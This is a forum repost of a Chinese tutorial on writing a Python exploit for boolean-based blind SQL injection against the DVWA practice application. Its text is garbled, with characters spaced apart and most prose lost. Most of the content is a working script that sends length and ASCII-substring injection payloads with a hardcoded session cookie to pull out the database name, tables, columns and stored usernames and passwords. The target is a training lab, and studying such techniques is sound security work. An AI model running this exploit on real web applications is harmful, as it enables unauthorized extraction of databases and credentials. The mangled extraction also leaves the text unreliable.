搜索

[26712] 2021-04-07_编写SQLInjection(Blind)布尔型盲注入exp

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2021-04-07_编写SQLInjection(Blind)布尔型盲注入exp 1 2 S Q L   I n j e c t i o n   ( B l i n d )   e x p   m o o n s e c   m o o n s e c   2 0 2 1 - 0 4 - 0 7   # E X P   , 4 p y t h o n 3 E X P S Q L   I n j e c t i o n   ( B l i n d )   e x p D V W A E X P E X P p y t h o n 3 e x p h t t p s : / / g i t h u b . c o m / d i g i n i n j a / D V W A s q l s q l   t i m e d v w a l o w 访 i d h t t p : / / w w w . d v w a . c o m / v u l n e r a b i l i t i e s / s q l i _ b l i n d / ? i d = 1 & S u b m i t = S u b m i t #
3 i d i d e x i s t s   e x p e x p   a s c i i     e x i s t s 退 # c o d i n g : u t f 8 i m p o r t   r e q u e s t s i m p o r t   t i m e u r l = " h t t p : / / w w w . d v w a . c o m / v u l n e r a b i l i t i e s / s q l i _ b l i n d / ? i d = 1 " c o o k i e s   = { " P H P S E S S I D " : " c m p f q e 7 l d m d m 0 5 m m a g p k t q a c o 4 " , " s e c u r i t y " : " l o w " } d b n a m e = " d a t a b a s e ( ) " u s e r = " u s e r ( ) " p a s s w o r d = " ( s e l e c t   c o n c a t ( u s e r , p a s s w o r d )   f r o m   u s e r s   l i m i t   1 ) " t a b l e s = " ( s e l e c t   g r o u p _ c o n c a t ( T A B L E _ N A M E )   f r o m   i n f o r m a t i o n _ s c h e m a . T A B L E S   w h e r e   T A B L E _ S C H E M A = d a t a b a s e ( )   l i m i t   1 ) " c o l u m n s = " ( s e l e c t   g r o u p _ c o n c a t ( C O L U M N _ N A M E )   f r o m   i n f o r m a t i o n _ s c h e m a . C O L U M N S   w h e r e   T A B L E _ N A M E = 0 x 7 5 7 3 6 5 7 2 7 3   l i m i t   1 ) " d e f   g e t _ l e n t h ( s q l ) :         n = 1         w h i l e   T r u e :                 r e q = r e q u e s t s . g e t ( u r l = u r l + " ' a n d   l e n g t h ( { } ) = { } - - % 2 0 & S u b m i t = S u b m i t # " . f o r m a t ( s q l , n ) , c o o k i e s = c o o k i e s )                 i f   ' e x i s t s '   i n   r e q . t e x t :                         b r e a k                 n = n + 1         r e t u r n   n d e f   g e t _ d a t a ( s q l ) :         p a y l o a d   =   ' 0 1 2 3 4 5 6 7 8 9 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z . @ _ '         p a s s w d = ' '
4           f o r   i   i n   r a n g e ( 1 , g e t _ l e n t h ( s q l ) + 1 ) :                 f o r   p   i n   p a y l o a d :                         t u r l = u r l + " ' + a n d + a s c i i ( s u b s t r i n g ( { } , { } , 1 ) ) = { } - - % 2 0 & S u b m i t = S u b m i t # " . f o r m a t ( s q l , i , o r d ( p ) )                         r e q   =   r e q u e s t s . g e t ( u r l = t u r l ,   c o o k i e s = c o o k i e s )                         i f   ' e x i s t s '   i n   r e q . t e x t :                                 p a s s w d + = p                                 p r i n t ( " [ + ] [ * ] " + p a s s w d )                                 b r e a k         r e t u r n   p a s s w d p r i n t ( " [ * ] % s   [ * ] "   %   g e t _ d a t a ( d b n a m e ) ) p r i n t ( " [ * ] % s   [ * ] "   %   g e t _ d a t a ( t a b l e s ) ) p r i n t ( " [ * ] % s   [ * ] "   %   g e t _ d a t a ( c o l u m n s ) ) p r i n t ( " [ * ] % s   [ * ] "   %   g e t _ d a t a ( p a s s w o r d ) )
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理